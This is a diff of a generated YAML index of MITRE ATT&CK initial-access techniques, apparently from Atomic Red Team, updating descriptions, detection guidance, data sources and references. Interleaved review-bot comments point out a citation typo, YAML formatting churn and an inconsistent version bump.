additional tools transferred to the system. x_mitre_data_sources: - - Packet capture - - Network device logs - - Process use of network - - Web proxy - - Network intrusion detection system - - SSL/TLS inspection + - 'File: File Creation' + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + - 'Application Log: Application Log Content' x_mitre_version: '1.2' atomic_tests: [] T1190: 
@@ -63295,12 +66646,14 @@ initial-access: accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). - \n\nIf an application is hosted on cloud-based infrastructure, then exploiting - it may lead to compromise of the underlying instance. This can allow an adversary - a path to access the cloud APIs or to take advantage of weak identity and - access management policies.\n\nFor websites and databases, the OWASP top 10 - and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: - OWASP Top 10)(Citation: CWE top 25)" + \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, + then exploiting it may lead to compromise of the underlying instance or container. + This can allow an adversary a path to access the cloud or container APIs, + exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), + or take advantage of weak identity and access management policies.\n\nFor + websites and databases, the OWASP top 10 and CWE top 25 highlight the most + common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top + 25)" external_references: - source_name: mitre-attack external_id: T1190 
@@ -63340,30 +66693,25 @@ initial-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-21T01:10:54.358Z' + modified: '2021-04-12T18:25:16.409Z' created: '2018-04-18T17:59:24.739Z' x_mitre_platforms: - - Linux - Windows - - macOS - - AWS - - GCP - - Azure + - IaaS - Network + - Linux + - macOS + - Containers x_mitre_detection: Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation. x_mitre_data_sources: - - Azure activity logs - - AWS CloudTrail logs - - Stackdriver logs - - Packet capture - - Web logs - - Web application firewall logs - - Application logs - x_mitre_version: '2.2' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + x_mitre_version: '2.3' x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team - Praetorian x_mitre_is_subtechnique: false atomic_tests: [] 
@@ -63376,6 +66724,8 @@ initial-access: Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. + + Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware) external_references: - source_name: mitre-attack external_id: T1133 
@@ -63387,6 +66737,14 @@ initial-access: description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.' source_name: Volexity Virtual Private Keylogging + - source_name: Trend Micro Exposed Docker Server + url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html + description: Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants + Target Exposed Docker Servers. Retrieved April 5, 2021. + - source_name: Unit 42 Hildegard Malware + url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ + description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking + Malware Targeting Kubernetes. Retrieved April 5, 2021.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern 
@@ -63395,24 +66753,39 @@ initial-access: phase_name: persistence - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-06-19T20:07:09.600Z' + modified: '2021-04-22T20:22:02.443Z' created: '2017-05-31T21:31:44.421Z' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows - Linux + - Containers x_mitre_permissions_required: - User - x_mitre_detection: Follow best practices for detecting adversary use of [Valid - Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to - remote services. Collect authentication logs and analyze for unusual access - patterns, windows of activity, and access outside of normal business hours. + x_mitre_detection: |- + Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours. + + When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application. x_mitre_data_sources: - - Authentication logs + - 'Application Log: Application Log Content' + - 'Logon Session: Logon Session Metadata' + - 'Network Traffic: Network Traffic Flow' x_mitre_contributors: + - ExtraHop + - David Fiser, @anu4is, Trend Micro + - Alfredo Oliveira, Trend Micro + - Idan Frimark, Cisco + - Rory McCune, Aqua Security + - Yuval Avrahami, Palo Alto Networks + - Jay Chen, Palo Alto Networks + - Brad Geesaman, @bradgeesaman + - Magno Logan, @magnologan, Trend Micro + - Ariel Shuper, Cisco + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee - Daniel Oakley - Travis Smith, Tripwire - x_mitre_version: '2.1' + x_mitre_version: '2.2' identifier: T1133 atomic_tests: - name: Running Chrome VPN Extensions via the Registry 2 vpn extension 
@@ -63485,7 +66858,7 @@ initial-access: description: Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018. source_name: Ossmann Star Feb 2011 - - url: http://www.bsidesto.ca/2015/slides/Weapons_of_a_Penetration_Tester.pptx + - url: https://www.youtube.com/watch?v=lDvf4ScWbcQ description: Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018. @@ -63508,7 +66881,7 @@ initial-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-09-16T16:12:48.086Z' + modified: '2021-04-22T17:47:04.476Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -63519,21 +66892,11 @@ initial-access: computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports." - x_mitre_data_sources: - - Asset management - - Data loss prevention x_mitre_version: '1.1' atomic_tests: [] T1078.003: technique: - external_references: - - source_name: mitre-attack - external_id: T1078.003 - url: https://attack.mitre.org/techniques/T1078/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Accounts + id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 description: "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for 
@@ -63542,7 +66905,14 @@ initial-access: and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. " - id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 + name: Local Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.003 + url: https://attack.mitre.org/techniques/T1078/003 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack 
@@ -63553,23 +66923,25 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:48:41.083Z' + modified: '2021-04-05T12:51:00.663Z' created: '2020-03-13T20:26:46.695Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Perform regular audits of local system accounts to detect - accounts that may have been created by an adversary for persistence. Look - for suspicious account behavior, such as accounts logged in at odd times or - outside of business hours. - x_mitre_data_sources: - - Authentication logs x_mitre_platforms: - Linux - macOS - Windows + - Containers + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Perform regular audits of local system accounts to detect + accounts that may have been created by an adversary for persistence. Look + for suspicious account behavior, such as accounts logged in at odd times or + outside of business hours. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' identifier: T1078.003 atomic_tests: - name: Create local account with admin priviliges 
@@ -63594,7 +66966,7 @@ initial-access: description: |- Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. - Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms. + Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source. name: Phishing created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: 
@@ -63606,38 +66978,45 @@ initial-access: - external_id: CAPEC-98 source_name: capec url: https://capec.mitre.org/data/definitions/98.html + - source_name: Microsoft Anti Spoofing + url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide + description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP. + Retrieved October 19, 2020. + - source_name: ACSC Email Spoofing + url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf + description: Australian Cyber Security Centre. (2012, December). Mitigating + Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-18T01:55:03.337Z' + modified: '2021-04-14T14:38:43.211Z' created: '2020-03-02T18:45:07.892Z' + x_mitre_contributors: + - Philip Winther x_mitre_platforms: - Linux - macOS - Windows - SaaS - Office 365 + - Google Workspace x_mitre_detection: |- Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems. + Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. 
Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. x_mitre_is_subtechnique: false - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_data_sources: - - File monitoring - - Packet capture - - Web proxy - - Email gateway - - Mail server - - Network intrusion detection system - - Detonation chamber - - SSL/TLS inspection - - Anti-virus + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' atomic_tests: [] T1091: technique: @@ -63670,8 +67049,10 @@ initial-access: x_mitre_is_subtechnique: false x_mitre_version: '1.0' x_mitre_data_sources: - - File monitoring - - Data loss prevention + - 'Process: Process Creation' + - 'File: File Access' + - 'File: File Creation' + - 'Drive: Drive Creation' x_mitre_detection: Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, 
@@ -63695,34 +67076,65 @@ initial-access: - external_id: CAPEC-163 source_name: capec url: https://capec.mitre.org/data/definitions/163.html + - source_name: Microsoft Anti Spoofing + url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide + description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP. + Retrieved October 19, 2020. + - source_name: ACSC Email Spoofing + url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf + description: Australian Cyber Security Centre. (2012, December). Mitigating + Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. + - source_name: Elastic - Koadiac Detection with EQL + url: https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql + description: 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: + Building detections against Koadic using EQL. Retrieved November 30, 2020.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Spearphishing Attachment - description: |- - Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. - - There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. 
Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. + description: "Adversaries may send spearphishing emails with a malicious attachment + in an attempt to gain access to victim systems. Spearphishing attachment is + a specific variant of spearphishing. Spearphishing attachment is different + from other forms of spearphishing in that it employs the use of malware attached + to an email. All forms of spearphishing are electronically delivered social + engineering targeted at a specific individual, company, or industry. In this + scenario, adversaries attach a file to the spearphishing email and usually + rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain + execution. Spearphishing may also involve social engineering techniques, such + as posing as a trusted source.\n\nThere are many options for the attachment + such as Microsoft Office documents, executables, PDFs, or archived files. + Upon opening the attachment (and potentially clicking past protections), the + adversary's payload exploits a vulnerability or directly executes on the user's + system. The text of the spearphishing email usually tries to give a plausible + reason why the file should be opened, and may explain how to bypass system + protections in order to do so. 
The email may also contain instructions on + how to decrypt an attachment, such as a zip file password, in order to evade + email boundary defenses. Adversaries frequently manipulate file extensions + and icons in order to make attached executables appear to be document files, + or files exploiting one application appear to be a file for a different one. " id: attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-18T01:52:25.316Z' + modified: '2021-04-01T16:21:17.553Z' created: '2020-03-02T19:05:18.137Z' - x_mitre_version: '2.0' + x_mitre_contributors: + - Philip Winther + x_mitre_version: '2.1' x_mitre_is_subtechnique: true x_mitre_detection: |- Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems. + Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts. 
+ + Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL) x_mitre_data_sources: - - File monitoring - - Packet capture - - Network intrusion detection system - - Detonation chamber - - Email gateway - - Mail server + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - macOS - Windows 
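Review bot: the new reference and the citation tag in x_mitre_detection both spell the tool as "Koadiac" (source_name: Elastic - Koadiac Detection with EQL), while the linked Elastic URL uses "koadic"; the tag still resolves because the two spellings match each other, but this is upstream ATT&CK STIX content, so the fix belongs upstream rather than in the generated index.yaml, otherwise the next regeneration reintroduces it. Minor, same hunk: "spawning Powershell.exe" mixes casing with the binary name.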
@@ -63797,26 +67209,10 @@ initial-access: T1566.002: technique: id: attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7 - description: "Adversaries may send spearphishing emails with a malicious link - in an attempt to gain access to victim systems. Spearphishing with a link - is a specific variant of spearphishing. It is different from other forms of - spearphishing in that it employs the use of links to download malware contained - in email, instead of attaching malicious files to the email itself, to avoid - defenses that may inspect email attachments. \n\nAll forms of spearphishing - are electronically delivered social engineering targeted at a specific individual, - company, or industry. In this case, the malicious emails contain links. Generally, - the links will be accompanied by social engineering text and require the user - to actively click or copy and paste a URL into a browser, leveraging [User - Execution](https://attack.mitre.org/techniques/T1204). The visited website - may compromise the web browser using an exploit, or the user will be prompted - to download applications, documents, zip files, or even executables depending - on the pretext for the email in the first place. Adversaries may also include - links that are intended to interact directly with an email reader, including - embedded images intended to exploit the end system directly or verify the - receipt of an email (i.e. web bugs/web beacons). Links may also direct users - to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, - like OAuth tokens, in order to gain access to protected applications and information.(Citation: - Trend Micro Pawn Storm OAuth 2017)" + description: |- + Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. 
It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. + + All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017) name: Spearphishing Link created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: 
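Review bot: this hunk is almost entirely scalar-style noise: the T1566.002 description is converted from a double-quoted folded scalar to a `|-` literal block, while the previous hunk converted the T1566.001 description in the opposite direction (from `|-` to double-quoted). The only substantive change here is the added sentence "Spearphishing may also involve social engineering techniques, such as posing as a trusted source." Suggest pinning the YAML dumper's scalar style and line width in the doc generator so content edits are not buried in reflows.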
@@ -63832,11 +67228,19 @@ initial-access: url: https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks description: Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. + - source_name: Microsoft Anti Spoofing + url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide + description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP. + Retrieved October 19, 2020. + - source_name: ACSC Email Spoofing + url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf + description: Australian Cyber Security Centre. (2012, December). Mitigating + Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-18T01:53:39.818Z' + modified: '2021-04-14T14:38:42.715Z' created: '2020-03-02T19:15:44.182Z' x_mitre_platforms: - Linux 
@@ -63844,21 +67248,21 @@ initial-access: - Windows - Office 365 - SaaS + - Google Workspace x_mitre_detection: |- URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. + Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. x_mitre_is_subtechnique: true - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_data_sources: - - Packet capture - - Web proxy - - Email gateway - - Detonation chamber - - SSL/TLS inspection - - DNS records - - Mail server + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_contributors: + - Philip Winther - Shailesh Tiwary (Indian Army) - Mark Wee - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services) @@ -63906,9 +67310,9 @@ initial-access: modified: '2020-10-18T01:55:02.988Z' created: '2020-03-02T19:24:00.951Z' x_mitre_data_sources: - - SSL/TLS inspection - - Anti-virus - - Web proxy + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_detection: "Because most common third-party services used for spearphishing 
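Review bot: in the second hunk here (@@ -63906), T1566.003's x_mitre_data_sources are replaced with the new 'Application Log: ...' / 'Network Traffic: ...' entries, but the surrounding context lines keep modified: '2020-10-18T01:55:02.988Z' and x_mitre_version: '2.0' unchanged, whereas T1566.001 and T1566.002 receive new modified timestamps and a bump to '2.1' alongside the same data-source migration. Worth confirming this mirrors the upstream STIX rather than a partial regeneration; any consumer that keys change detection on modified/version will miss this update.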
@@ -63928,30 +67332,14 @@ initial-access: atomic_tests: [] T1195: technique: - id: attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Supply Chain Compromise - description: "Adversaries may manipulate products or product delivery mechanisms - prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply - chain compromise can take place at any stage of the supply chain including:\n\n* - Manipulation of development tools\n* Manipulation of a development environment\n* - Manipulation of source code repositories (public or private)\n* Manipulation - of source code in open-source dependencies\n* Manipulation of software update/distribution - mechanisms\n* Compromised/infected system images (multiple cases of removable - media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider - Electric USB Malware) \n* Replacement of legitimate software with modified - versions\n* Sales of modified/counterfeit products to legitimate distributors\n* - Shipment interdiction\n\nWhile supply chain compromise can impact any component - of hardware or software, attackers looking to gain execution have often focused - on malicious additions to legitimate software in software distribution or - update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil - 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired - victim set (Citation: Symantec Elderwood Sept 2012) or malicious software - may be distributed to a broad set of consumers but only move on to additional - tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command - Five SK 2011) Popular open source projects that are used as dependencies in - many applications may also be targeted as a means to add malicious code to - users of the dependency. 
(Citation: Trendmicro NPM Compromise)" + created: '2018-04-18T17:59:24.739Z' + modified: '2021-01-06T19:32:28.382Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: initial-access + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1195 @@ -63988,7 +67376,7 @@ initial-access: description: Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018. source_name: Command Five SK 2011 - - url: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf + - url: https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf description: O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. source_name: Symantec Elderwood Sept 2012 
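Review bot: the T1195 hunk (@@ -63928) reads as a rewrite but is mostly key reordering: id, created_by_ref, name and description are removed here and re-added further down in the next hunk, while created/modified/kill_chain_phases/type/object_marking_refs move up. Suggest emitting keys in a stable, sorted order from the generator so a regeneration diff shows only the actual changes (here, the modified timestamp and the Elderwood URL moving to a web.archive.org snapshot).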
@@ -63996,61 +67384,76 @@ initial-access: url: https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-10-13T12:38:32.426Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Veeral Patel - x_mitre_platforms: - - Linux - - Windows - - macOS + description: "Adversaries may manipulate products or product delivery mechanisms + prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply + chain compromise can take place at any stage of the supply chain including:\n\n* + Manipulation of development tools\n* Manipulation of a development environment\n* + Manipulation of source code repositories (public or private)\n* Manipulation + of source code in open-source dependencies\n* Manipulation of software update/distribution + mechanisms\n* Compromised/infected system images (multiple cases of removable + media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider + Electric USB Malware) \n* Replacement of legitimate software with modified + versions\n* Sales of modified/counterfeit products to legitimate distributors\n* + Shipment interdiction\n\nWhile supply chain compromise can impact any component + of hardware or software, attackers looking to gain execution have often focused + on malicious additions to legitimate software in software distribution or + update channels. 
(Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil + 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired + victim set (Citation: Symantec Elderwood Sept 2012) or malicious software + may be distributed to a broad set of consumers but only move on to additional + tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command + Five SK 2011) Popular open source projects that are used as dependencies in + many applications may also be targeted as a means to add malicious code to + users of the dependency. (Citation: Trendmicro NPM Compromise)" + name: Supply Chain Compromise + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7 + x_mitre_version: '1.2' x_mitre_detection: Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering. - x_mitre_data_sources: - - Web proxy - - File monitoring - x_mitre_version: '1.2' - atomic_tests: [] - T1199: - technique: - id: attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Trusted Relationship - description: |- - Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. - - Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. 
Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used. - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1199 - external_id: T1199 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-07-14T19:38:14.299Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_is_subtechnique: false x_mitre_platforms: - Linux - Windows - macOS - - AWS - - GCP - - Azure - - SaaS + x_mitre_contributors: + - Veeral Patel + x_mitre_is_subtechnique: false + atomic_tests: [] + T1199: + technique: + created: '2018-04-18T17:59:24.739Z' + modified: '2021-03-08T10:33:01.045Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: initial-access + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1199 + url: https://attack.mitre.org/techniques/T1199 + - source_name: CISA IT Service Providers + url: https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers + description: CISA. (n.d.). APTs Targeting IT Service Provider Customers. Retrieved + November 16, 2020. + description: |- + Adversaries may breach or otherwise leverage organizations who have access to intended victims. 
